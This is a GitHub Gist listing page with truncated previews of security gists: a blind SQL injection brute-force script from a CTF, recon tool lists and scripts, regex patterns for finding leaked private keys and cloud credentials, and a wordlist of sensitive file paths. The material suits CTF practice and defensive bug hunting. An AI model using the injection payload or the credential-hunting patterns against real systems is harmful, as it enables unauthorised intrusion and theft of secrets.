Skip to content

Instantly share code, notes, and snippets.

@ZhangYiJiang
ZhangYiJiang / sql_injection.js
Created August 22, 2015 13:09
NUS Greyhats CTF Day 2 - Brute force password cracking on a blind SQL injection form
// Run this first: injects jQuery into the page
var s = document.createElement('script');
s.src = 'https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js';
document.body.appendChild(s);
// SQL query: 1' AND FALSE UNION SELECT * FROM users WHERE password LIKE 'a%' #
// Recursive function to brute force out the password from the page
function getPassword(p) {
$.post('http://web.nusgreyhats.org/blindsqli/register.php', {
register: "1' AND FALSE UNION SELECT * FROM users WHERE password LIKE '" + p + "%' #"
@jivoi
jivoi / offsec.md
Last active September 20, 2024 07:23
Penetrating Testing/Assessment Workflow

Penetrating Testing/Assessment Workflow & other fun infosec stuff

https://github.com/jivoi/pentest

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

Tools of The Bug Hunters Methodology V2

NOTE: The following list has been created based on the PPT "The Bug Hunters Methodology V2 by @jhaddix"

Discovery

  • Sublist3r (Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT).
  • Brutesubs (An automation framework for running multiple open sourced subdomain bruteforcing tools (in parallel) using your own wordlists via Docker Compose).
  • Cloudflare_enum (Cloudflare DNS Enumeration Tool for Pentesters).
  • Censys.py (Quick and Dirty script to use the Censys API to query subdomains of a target domain).
  • massdns (A high-performance DNS stub resolver).
██████╗ ███████╗ ██████╗ ██████╗ ███╗ ██╗
██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗ ██║
██████╔╝█████╗ ██║ ██║ ██║██╔██╗ ██║
██╔══██╗██╔══╝ ██║ ██║ ██║██║╚██╗██║
██║ ██║███████╗╚██████╗╚██████╔╝██║ ╚████║
╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝
@intx0x80
@zenosxx
zenosxx / subdomain.sh
Last active April 26, 2021 08:28
Subdomain recon
#!/bin/bash
echo "Recon $1"
domain=$1
path="~/Desktop/Asset-note/"
folder=recon-$(date +"%Y-%m-%d")
sub_path=$path/$domain/$folder/subdomain
filemon_path=$path/$domain/Filemonitor
@tehryanx
tehryanx / trufflehog.json
Last active June 3, 2022 08:26
High signal patterns from trufflehog refactored to work with tomnomnom's gf
{
"flags": "-HnriE",
"patterns": [
"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})",
"-----BEGIN RSA PRIVATE KEY-----",
"-----BEGIN DSA PRIVATE KEY-----",
"-----BEGIN EC PRIVATE KEY-----",
"-----BEGIN PGP PRIVATE KEY BLOCK-----",
"AKIA[0-9A-Z]{16}",
"amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}",
@tomnomnom
tomnomnom / short-wordlist.txt
Created September 29, 2019 19:44
short-wordlist
/.s3cfg
/phpunit.xml
/nginx.conf
/.vimrc
/LICENSE.md
/yarn.lock
/Gulpfile
/Gulpfile.js
/composer.json
/.npmignore
[ SecHackLabs ~/Projects/Rust/Development/findomain ] [develop]
└─ ▶ time ./target/release/findomain -t aol.com --query-database -i --threads 100

Target ==> aol.com

Searching subdomains in the Findomain database for the target aol.com 🔍

Performing asynchronous subdomains resolution for 70600 subdomains with 100 threads, it will take a while. 🧐
```zshrc
#▄███████▄ ▄████████ ▄█ █▄ ▄████████ ▄████████
#██▀ ▄██ ███ ███ ███ ███ ███ ███ ███ ███
# ▄███▀ ███ █▀ ███ ███ ███ ███ ███ █▀
#▀█▀▄███▀▄▄ ███ ▄███▄▄▄▄███▄▄ ▄███▄▄▄▄██▀ ███
# ▄███▀ ▀ ▀███████████ ▀▀███▀▀▀▀███▀ ▀▀███▀▀▀▀▀ ███
#▄███▀ ███ ███ ███ ▀███████████ ███ █▄
#███▄ ▄█ ▄█ ███ ███ ███ ███ ███ ███ ███
#▀████████▀ ▄████████▀ ███ █▀ ███ ███ ████████▀
# ███ ███
@dwisiswant0
dwisiswant0 / st8out.sh
Last active February 17, 2024 16:48
St8out - Extra one-liner for reconnaissance
#!/bin/bash
#####
#
# St8out - Extra one-liner for reconnaissance
#
# Usage: ./st8out.sh target.com
#
# Resources:
# - https://github.com/j3ssie/metabigor